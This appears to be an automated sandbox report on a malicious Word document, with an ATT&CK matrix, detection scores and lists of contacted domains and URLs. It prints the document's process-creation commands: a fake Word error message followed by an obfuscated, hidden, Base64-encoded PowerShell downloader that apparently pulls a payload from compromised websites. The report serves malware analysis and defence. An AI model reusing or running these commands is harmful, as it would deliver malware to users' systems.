Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting22Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting22Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Informacion_29.doc63%VirustotalBrowse
Informacion_29.doc79%ReversingLabsDocument-Office.Trojan.GenScript

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.tra0%Avira URL Cloudsafe
https://ketoresetme.com/wp-content/uploads/2021/01/My-Southern-Keto-Kitchen-Cookbook-HOW-I-GOT-HERE-0%Avira URL Cloudsafe
https://thebestfikrah.com/wp-content/uploads/2020/11/cropped-logo-tbf-1-1.png0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.uti0%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.60%Avira URL Cloudsafe
https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/#respond0%Avira URL Cloudsafe
http://wheelcomoving.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-ea0%Avira URL Cloudsafe
https://ketoresetme.com/wp-content/uploads/2020/09/11.jpg0%Avira URL Cloudsafe
https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/ea-style.css?ver=20%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.40%Avira URL Cloudsafe
https://wheelcomoving.com/services/0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.60%Avira URL Cloudsafe
https://thebestfikrah.com/category/Treasure-Seerah/0%Avira URL Cloudsafe
https://wheelcomoving.com/wp-admin/admin-ajax.php0%Avira URL Cloudsafe
https://thebestfikrah.com/issues/articles-the-central-message/0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/font-awesome.min.c0%Avira URL Cloudsafe
https://thebestfikrah.com/wp-content/uploads/2019/04/thebestfikrah_ico_square_100x100-01.png0%Avira URL Cloudsafe
https://ketoresetme.com/author/admin/0%Avira URL Cloudsafe
https://ketoresetme.com/category/keto-summit/0%Avira URL Cloudsafe
https://thebestfikrah.com/category/Islam-Today/0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/awsm-team/js/team.min.js?ver=1.2.10%Avira URL Cloudsafe
https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/0%Avira URL Cloudsafe
https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.png0%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.60%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.kre0%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.60%Avira URL Cloudsafe
http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.10%Avira URL Cloudsafe
https://ketoresetme.com/category/keto-news/0%Avira URL Cloudsafe
http://ketoresetme.com/xmlrpc.php0%Avira URL Cloudsafe
http://00zyku.com0%Avira URL Cloudsafe
https://ketoresetme.com/wp-content/uploads/2020/09/reclama-lifestyle.jpg0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/wp-video-posts/js/wpvp-front-end.js0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/third/lightbox.min.js?ver=2.0.20%Avira URL Cloudsafe
https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.10%Avira URL Cloudsafe
https://rajwap.pro/0%Avira URL Cloudsafe
https://wheelcomoving.com/company/contact/0%Avira URL Cloudsafe
https://phawayagency.com0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/simple-download-monitor/css/sdm_wp_styles.css?ver=5.60%Avira URL Cloudsafe
https://ketoresetme.com/contact-us/0%Avira URL Cloudsafe
https://stage.thebestfikrah.com/?s=0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/style.min.css?ver=2.0.20%Avira URL Cloudsafe
https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-B0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css?ver=5.2.40%Avira URL Cloudsafe
http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.60%Avira URL Cloudsafe
https://arabysexy.mobi/0%Avira URL Cloudsafe
http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp0%Avira URL Cloudsafe
http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.10%Avira URL Cloudsafe
https://dirtyindianporn.info/0%Avira URL Cloudsafe
https://thebestfikrah.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png0%Avira URL Cloudsafe
https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-2180%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.60%Avira URL Cloudsafe
https://wheelcomoving.com/services/ocean-cargo/0%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v0%Avira URL Cloudsafe
https://ketoresetme.com/privacy-policy-2/0%Avira URL Cloudsafe
https://thebestfikrah.com/about-us/0%Avira URL Cloudsafe
http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/css/frontend.mi0%Avira URL Cloudsafe
http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.10%Avira URL Cloudsafe
https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-1000%Avira URL Cloudsafe
https://wheelcomoving.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=0%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.40%Avira URL Cloudsafe
https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/0%Avira URL Cloudsafe
https://indianpornmovies.info/0%Avira URL Cloudsafe
https://ketoresetme.com/category/keto/0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/js/frontend.min0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
https://wheelcomoving.com/company/0%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/themes/cargo/js/sliders.js?ver=5.60%Avira URL Cloudsafe
https://ketoresetme.com/wp-content/uploads/2020/09/ttt.png0%Avira URL Cloudsafe
https://wheelcomoving.com/wp-json/0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://thebestfikrah.com/wp-content/plugins/genesis-blocks/dist/blocks.style.build.css?ver=1609898680%Avira URL Cloudsafe
https://ketoresetme.com/shop/0%Avira URL Cloudsafe
https://d-cem.comp0%Avira URL Cloudsafe
https://rajwap.me/0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/uploads/elementor/css/global.css?ver=16098973800%Avira URL Cloudsafe
https://rycomputer.com0%Avira URL Cloudsafe
http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.60%Avira URL Cloudsafe
https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/#respond0%Avira URL Cloudsafe
http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/main.min.js?ver=2.0.20%Avira URL Cloudsafe
https://ketoresetme.com/category/keto-diet/0%Avira URL Cloudsafe
https://thebestfikrah.com/solution/articles-the-central-message/0%Avira URL Cloudsafe
https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
rycomputer.com
58.97.195.135
truetrue
    unknown
    phawayagency.com
    35.209.78.196
    truetrue
      unknown
      00zyku.com
      193.187.117.26
      truetrue
        unknown
        wheelcomoving.com
        66.85.46.76
        truetrue
          unknown
          thebestfikrah.com
          103.8.25.63
          truetrue
            unknown
            d-cem.com
            35.214.169.246
            truetrue
              unknown
              ketoresetme.com
              70.32.23.58
              truetrue
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.trapowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ketoresetme.com/wp-content/uploads/2021/01/My-Southern-Keto-Kitchen-Cookbook-HOW-I-GOT-HERE-powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
